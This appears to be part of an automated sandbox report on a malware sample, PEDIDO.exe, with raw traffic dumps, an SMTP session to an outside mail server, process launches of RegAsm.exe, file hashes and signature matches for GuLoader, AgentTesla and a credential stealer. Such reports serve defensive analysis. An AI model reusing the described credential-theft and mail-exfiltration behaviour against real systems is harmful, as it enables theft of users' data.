64 1e c8 b5 41 28 27 91 af 1c f9 38 3f 18 1a 08 90 1f ba 28 cf 19 3c 19 be 46 e9 e0 39 62 cf 6b 21 dd eb 98 6d 56 70
                                                                        Data Ascii: J(weFA5:59`nmh6 oQ!+- 7^2{]"PQ<#)#=ZHG|2YpLb<x?Ns)~N!lsxizqSDc0o,LakJ[Nnr3*nK3tw!:,}z|=/dA('8?(<F9bk!mVp
                                                                        2021-10-14 08:47:23 UTC219INData Raw: 01 cb 0a 30 ab 26 85 aa ca d9 4f ad 03 23 77 98 e4 25 24 34 56 7c 55 5a 85 59 32 0e a4 b7 61 e6 b9 a4 8f c9 31 ce b0 4b 1c 49 f1 f2 11 f3 c9 2e 5a 19 2c 76 ea 88 4d 22 4a 31 e2 b0 a9 0f c7 33 97 5d 19 02 cd fc 01 71 89 5a a2 2b 17 ac 55 16 3f 00 d4 b1 0f eb 88 35 41 5d d7 74 85 81 45 54 3c d2 8c ea 2f 43 b1 27 a2 39 5f 6b 22 16 7c d6 25 60 7d b1 f3 91 4b cb 09 4b 62 78 a6 09 c6 6c 3c 68 3b 98 ea 85 5f 6a 3a b5 3f 5f 0b c7 af b4 bc e2 28 84 86 32 92 c9 d8 7e 8b c2 cf 4c 42 e4 92 30 7e 9a bc 2e 0a 6b 23 7c ce 9d 6d 22 e0 2f 0d 9b f4 4b d4 95 8f fb 53 5d 88 8e 7b 0a 49 d5 b5 19 a8 dd 81 19 58 53 9c f4 a8 cc 6c fa 8e ef 60 d1 e1 44 c2 76 bb 05 de 9d ea fa de 2f 87 3f 30 af b7 13 7f ca 38 eb 85 88 75 dd 74 0a 94 a2 ed 7a a9 72 1a 73 da 98 96 05 c3 09 a0 6b 29
                                                                        Data Ascii: 0&O#w%$4V|UZY2a1KI.Z,vM"J13]qZ+U?5A]tET</C'9_k"|%`}KKbxl<h;_j:?_(2~LB0~.k#|m"/KS]{IXSl`Dv/?08utzrsk)
                                                                        2021-10-14 08:47:23 UTC220INData Raw: 73 46 1e 48 ca 8b b5 52 47 a9 ea ea 13 8a 67 60 2c e0 92 33 1b f4 bb c9 9b fe ff 2a cf 7c ca aa 75 65 25 6a 8f cb e8 23 34 9d f0 0b 97 31 e9 ad d5 a6 86 87 bd c1 e7 4f e1 7a 5a 7e 3f ea ff c3 11 6d 3e ca b7 53 a8 cb 83 2f c9 f5 3f 39 05 1f 02 92 0d 3a fd d2 1c 34 1e 9e 44 e3 ea 28 e1 1e 61 01 de ea 8a ed 83 61 9c 72 d1 a9 c4 06 e8 94 0e f4 33 e8 0e 69 3a fa d7 20 1a e6 d8 67 73 c4 01 85 dd a5 64 a3 29 d9 96 ea 98 eb 59 cf 89 82 b3 d6 8e b3 09 2c aa 5f 19 3f ad e6 5d 11 85 8f 95 54 41 e1 57 5d 3b fe af 98 da 31 70 7b af ae 4a a3 2d b2 50 98 8f f2 6b 60 40 af 2f 28 ea 14 31 e1 e4 d9 0f 27 c1 9f 50 76 1e 3c 99 a0 5a b3 1d 2d 05 6c 2c 8d fb 97 0b 42 cc 30 a9 3d c4 75 09 f8 62 cd 87 17 92 28 7a 72 2f 44 92 b5 2d 4f 27 73 51 cd da 71 df 06 3c f4 95 07 aa e6 37
                                                                        Data Ascii: sFHRGg`,3*|ue%j#41OzZ~?m>S/?9:4D(aar3i: gsd)Y,_?]TAW];1p{J-Pk`@/(1'Pv<Z-l,B0=ub(zr/D-O'sQq<7
                                                                        2021-10-14 08:47:23 UTC221INData Raw: e9 ff 04 f6 a6 b4 34 7c d6 b0 20 76 b2 94 12 37 57 0b 44 e1 ee 0d 4f 90 6a 7f f2 94 2d 94 e0 ee 91 27 34 f0 f5 03 65 6a c4 a2 25 95 f8 a9 21 71 32 7d 96 d8 be 05 9c 73 d0 6b dc c3 79 fb 4b a6 7d 8b ed 83 b6 ad 4c f5 04 20 a0 81 3b 18 a4 4e 93 ed e4 11 ac 42 0d 9e a1 e8 74 b8 f6 1f 61 5e 91 9d 02 c5 07 b2 ea b4 38 8d aa 30 4d 3b fa 9f a0 01 78 b2 43 b2 3e af 87 74 12 08 60 ff 7e ef 08 1b f8 be 6d aa a7 96 94 7d 42 75 e0 41 5d c6 2a 2f 65 cb 79 de fe cb b3 ae 25 cc 98 41 82 42 91 a1 dc 68 bc 61 98 c1 c0 8a d2 93 f2 6f cb 6d 53 e6 d5 6d 6a 38 04 58 6d 3e ca fa 83 2a da 3c 73 c7 66 e5 6a 03 f6 44 53 72 39 93 1f fb e5 35 39 27 12 9b 2b 15 b5 7f ed 91 e7 01 b2 34 32 ef ef d9 d1 55 2a bf c4 bd 4a c7 fe ad 61 2e 39 50 d3 35 f6 69 dd 21 2a 40 71 83 0d 01 14 2d 4c
                                                                        Data Ascii: 4| v7WDOj-'4ej%!q2}skyK}L ;NBta^80M;xC>t`~m}BuA]*/ey%ABhaomSmj8Xm>*<sfjDSr959'+42U*Ja.9P5i!*@q-L


                                                                        SMTP Packets

                                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                                        Oct 14, 2021 10:49:03.872208118 CEST58749827188.93.227.195192.168.11.20220-iberweb-11a.ibername.com ESMTP Exim 4.94.2 #2 Thu, 14 Oct 2021 09:49:03 +0100
                                                                        220-We do not authorize the use of this system to transport unsolicited,
                                                                        220 and/or bulk e-mail.
                                                                        Oct 14, 2021 10:49:03.873426914 CEST49827587192.168.11.20188.93.227.195EHLO 818225
                                                                        Oct 14, 2021 10:49:03.923958063 CEST58749827188.93.227.195192.168.11.20250-iberweb-11a.ibername.com Hello 818225 [102.129.143.96]
                                                                        250-SIZE 52428800
                                                                        250-8BITMIME
                                                                        250-PIPELINING
                                                                        250-PIPE_CONNECT
                                                                        250-AUTH PLAIN LOGIN
                                                                        250-STARTTLS
                                                                        250 HELP
                                                                        Oct 14, 2021 10:49:03.924401045 CEST49827587192.168.11.20188.93.227.195STARTTLS
                                                                        Oct 14, 2021 10:49:03.978167057 CEST58749827188.93.227.195192.168.11.20220 TLS go ahead

                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Start time:10:46:46
                                                                        Start date:14/10/2021
                                                                        Path:C:\Users\user\Desktop\PEDIDO.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\PEDIDO.exe'
                                                                        Imagebase:0x400000
                                                                        File size:98304 bytes
                                                                        MD5 hash:8BC016E5779262B772D16903AF6E142C
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:Visual Basic
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.69378058879.0000000002AA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        Reputation:low

                                                                        General

                                                                        Start time:10:47:05
                                                                        Start date:14/10/2021
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:'C:\Users\user\Desktop\PEDIDO.exe'
                                                                        Imagebase:0x4a0000
                                                                        File size:65440 bytes
                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate

                                                                        General

                                                                        Start time:10:47:05
                                                                        Start date:14/10/2021
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:'C:\Users\user\Desktop\PEDIDO.exe'
                                                                        Imagebase:0x360000
                                                                        File size:65440 bytes
                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate

                                                                        General

                                                                        Start time:10:47:05
                                                                        Start date:14/10/2021
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:'C:\Users\user\Desktop\PEDIDO.exe'
                                                                        Imagebase:0x3e0000
                                                                        File size:65440 bytes
                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate

                                                                        General

                                                                        Start time:10:47:06
                                                                        Start date:14/10/2021
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\PEDIDO.exe'
                                                                        Imagebase:0x750000
                                                                        File size:65440 bytes
                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmp, Author: Joe Security
                                                                        Reputation:moderate

                                                                        General

                                                                        Start time:10:47:06
                                                                        Start date:14/10/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6b9520000
                                                                        File size:875008 bytes
                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >